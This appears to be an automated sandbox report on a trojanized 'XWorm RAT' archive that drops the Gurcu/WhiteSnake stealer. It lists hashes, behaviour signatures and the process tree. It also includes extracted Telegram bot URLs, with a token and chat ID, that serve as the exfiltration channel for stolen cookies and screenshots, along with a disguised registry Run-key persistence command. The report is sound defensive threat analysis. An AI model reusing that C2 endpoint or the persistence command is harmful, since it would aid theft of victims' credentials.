Analysis
-
max time kernel
599s -
max time network
607s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
01-01-2025 03:07
General
-
Target
XWorm RAT V2.1.rar
-
Size
32.3MB
-
MD5
462d28c33afdd9482d7d10c08febf615
-
SHA1
04c8a9698de4abea97af69506f5fbdc093539b1a
-
SHA256
a7f8482b67e7000865195612c9a3028d0be97af52b4360f784054d5444b0b943
-
SHA512
f047c53c206dae5de7e09d2b3a1dfb169f1bcb2e5a075dbff82c5b8d21c5363cad4cd81b4a3bab61e551c21f6b4e930237639c0b1aaa44da608f93975dbec099
-
SSDEEP
786432:+LLnQRIjMRfdFZkRNlCVdICz0NMb7X+OwTPntsHx9RiPHQL+Wly:AkhXFZM2VOKDCkxSOA
Malware Config
Extracted
gurcu
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendMessage?chat_id=-1002258988684
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-
https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Gurcu family
-
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 12 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\XWorm RAT V2.1.rar"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\XWorm RAT V2.1\Fixer.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lodctr.exelodctr /r2⤵
- Drops file in System32 directory
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\XWorm RAT V2.1\Fixer.bat" "1⤵
-
C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Desktop\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe"C:\Users\Admin\Desktop\XWorm RAT V2.1\Command Reciever.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8E02.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8E02.tmp.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 844"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\find.exefind ":"4⤵
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
294B
MD518d5e77ecaa8fa5221de18f54c6632a9
SHA14efb1d83bc684b416d0829bdf0815fab078edaf4
SHA256bd99a3a31c242388813b4329ea681f69fb1743e0b43cdce3d590321fc4db7391
SHA512431dc9bb7814f3224725f014af4cf4c932c56ef604d2e9ff03e2cf04831510125dbbf8b483fa6eb5854d99a732db71e081d5aad0646e8d002af6fbdf63d394d8
-
Filesize
6.5MB
MD5a21db5b6e09c3ec82f048fd7f1c4bb3a
SHA1e7ffb13176d60b79d0b3f60eaea641827f30df64
SHA25667d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5
SHA5127caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c
-
Filesize
122B
MD52dabc46ce85aaff29f22cd74ec074f86
SHA1208ae3e48d67b94cc8be7bbfd9341d373fa8a730
SHA256a11703fd47d16020fa099a95bb4e46247d32cf8821dc1826e77a971cdd3c4c55
SHA5126a50b525bc5d8eb008b1b0d704f9942f72f1413e65751e3de83d2e16ef3cf02ef171b9da3fff0d2d92a81daac7f61b379fcf7a393f46e914435f6261965a53b3
-
Filesize
1.0MB
MD5c8db63170e85b35ce51b5d1aef098708
SHA1bd8489cc9017bfe308d748b1d62db1f154990acc
SHA2566c15c5f8e3faec8adf4321fd8f9d62f3f4dd645dafd0f9f6c52b118001654d36
SHA5124392ec79c297da34b1500799bd07eebbf1ca88b5d1efe80d9cf02d4cd9562ae617854d228876451aa53c5256f9a47b530f481da4cedb4d748b319d69a14e3a7b
-
Filesize
5.6MB
MD5eb01eece5f0887b24a1bd53183d801dc
SHA149e92aee8351e3a995d8ec95bc64d7f381dcee28
SHA256a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c
SHA51283374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839
-
Filesize
2.2MB
MD5835f081566e31c989b525bccb943569c
SHA171d04e0a86ce9585e5b7a058beb0a43cf156a332
SHA256ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579
SHA5129ec58f8c586ecf78ef8d75debc5dba58544558566423a634724bb5ab192aaf64f9ccbee9a5af48124a3366b2a7d24b4db71bb5743978201b881c08bad8f6fb0c
-
Filesize
39KB
MD5c6a00700213a4cdfac7b02faabc2fa10
SHA1d1fab1803050a67c59dfce442c1f1dacb166d0dc
SHA256987d276742eba82260ac1509adc8678651d30103162b44d4e62fbde1b2f28559
SHA512e3c879502f91b7e4ccbd300372108ffe0cfd2e49070c54f1b27fb83d3c0a7344ea7393b619f1fd6b21314915e32c50fb93f5a1511a383098107c57f1a14faf1d
-
Filesize
42KB
MD508728aef33bbac5884423c1597e74a29
SHA164d28ea3dc5c4392a0210b4d26db146b26e40f0b
SHA256fbd64fca18300003ddcdddf3b25ad501cf224035ef5975dedc64c7d139eb69e6
SHA512001cc1ef7a69ce59a9e37133a8cdf14cc8e7a09bc74d4678d9af25da3eaa9d99efc6fdf64fd2e301acb796cef4a988d502b63a61dcce14511568130bb1551a0c
-
Filesize
47KB
MD50cfd5298e63f44351ebca47f6a491fbe
SHA1b86c08b13f0e60f664be64cb4077f915f9fc1138
SHA256562261cc16c6e5e2e3841a1ba79083293baa40330fb5d4f7f62c3553df26ccb3
SHA512549e5c28598ac2a6b11936aa90f641dfa794c04dd642309d08ef90a683d995d8f2d3a69ee2ecd74adae5beb19e9de055e71670922d738bd985657ffe75ebe235
-
Filesize
46KB
MD5afc0429d5050b0057aea0a66a565c61a
SHA173f4910cee7b27a049d6dfe291bb6c8a99c6dc8b
SHA256f6847323dd961aef9230bca3409a01b7c4e5e16dcca8a2e2417c9dc750871cf6
SHA512a33920642f3ec69c04ff61b09149a57ea91e76bb8d51f1d393a31b5079a3f83939863d6a924bf2a2982786b2825bb634e3d0c0920c7bc0bf6a91e214ef8555bd
-
Filesize
32KB
MD550681b748a019d0096b5df4ebe1eab74
SHA10fa741b445f16f05a1984813c7b07cc66097e180
SHA25633295c7ee1b56a41e809432bc25dd745ba55b2dc91bfa97aa1f55156880cd71a
SHA512568439b3547dcbcce28499d45663fdd0e2222f6c5c90053769ce2585f65721f679c071393328bde72c9a3f03da4c17abb84b8303897688b59598887ceb31438e
-
Filesize
298KB
MD5eadd51b4e0a81aa0a1ec7392a1ce681a
SHA1f384c3bc0f16ccb5049ebbf7df776e684da84706
SHA2561a2fd21891c4055b2ee03ee06665f1a09a6503f7a4b57acba67820ec561d12e4
SHA512de74112ed8f81f4723241102e9e493921419f836e7f095000a0ae34616db1886c22dff6ab4dfd5bd1ebbc9840498c3606ac0e5791f7fadac1b52c18043571ae4
-
Filesize
310KB
MD51ad05e460c6fbb5f7b96e059a4ab6cef
SHA11c3e4e455fa0630aaa78a1d19537d5ff787960cf
SHA2560ae16c72ca5301b0f817e69a4bac29157369ecfbadc6c13a5a37db5901238c71
SHA512c608aa10b547003b25ff63bb1999a5fff0256aadd8b005fdd26569a9828d3591129a0f21c11ec8e5d5f390b11c49f2ef8a6e36375c9e13d547415e0ec97a398f
-
Filesize
360KB
MD51402add2a611322eb6f624705c8a9a4e
SHA1d08b0b5e602d4587e534cf5e9c3d04c549a5aa47
SHA2560ac43c8e77edb2c1468420653fc5d505b26cdc4da06c4121ce4bbecae561e6cb
SHA512177d5ea7e77eee154042b5e064db67a5cac9435890a2ff65cd98da21433f4e7de743e9df22ac0ac61be89fc0be8655b46454ed4a930d13fc7c1dfebe5896781f
-
Filesize
363KB
MD5d0a8d13996333367f0e1721ca8658e00
SHA1f48f432c5a0d3c425961e6ed6291ddb0f4b5a116
SHA25668a7924621a0fbc13d0ea151617d13732a991cef944aae67d44fc030740a82e9
SHA5128a68c62b5fc983975d010ae6504a1cbfdf34d5656e3277d9a09eb92929e201e27ca7bd2030740c8240a4afd56af57c223b4fd6de193bedf84ac7238777310de4
-
Filesize
340KB
MD5f9fcefdf318c60de1e79166043b85ec4
SHA1a99d480b322c9789c161ee3a46684f030ec9ad33
SHA2569c92309f7a11b916d0e9b99f9083f58b1a2fa7a9aad283b064f01c11781160e7
SHA512881e112fedccc8643d872396baf726ceb7a49c5cce09489ddcb88400b5a4578dd5ee62a4082d81a6c721c74edb00d84d225e08ab892cc094976149a1a2c486d8
-
Filesize
145KB
MD5f4f62aa4c479d68f2b43f81261ffd4e3
SHA16fa9ff1dbb2c6983afc3d57b699bc1a9d9418daa
SHA256c2f81f06c86bf118a97fba7772d20d2c4ba92944551cd14e9d9bab40bf22816c
SHA512cbd94b41fc3136c05981e880e1f854a5847a18708459112ca7eb0bdcb04d0034c42af8c58501a21ae56e07a29751236af9735b0a4ded3a6b0ef57d717acd5ff3
-
Filesize
122KB
MD5243bb32f23a8a2fa8113e879d73bfdf7
SHA12f9d0154d65d0b8979a1aeb95b6cf43384114f70
SHA25669012c5b50e669fca5ad692dc405017da474a5a4ec876de70d9748a4f30c046c
SHA51234f7663ef59412a12ce950eb5ab947b2fb6bb811d5cfd92d05b6a884bcb2fc31fdc880b8e152a383055ca0efee707eb23bbfe181ace8c1ca112262f2a75bf0a8
-
Filesize
5.6MB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
40KB
-
Filesize
5.6MB
-
Filesize
2.3MB
-
Filesize
72KB
-
Filesize
232KB
-
Filesize
3.2MB
-
Filesize
152KB
-
Filesize
424KB
-
Filesize
712KB
-
Filesize
320KB
-
Filesize
136KB
-
Filesize
40KB
-
Filesize
6.6MB
-
Filesize
408KB
-
Filesize
624KB
-
Filesize
344KB
-
Filesize
584KB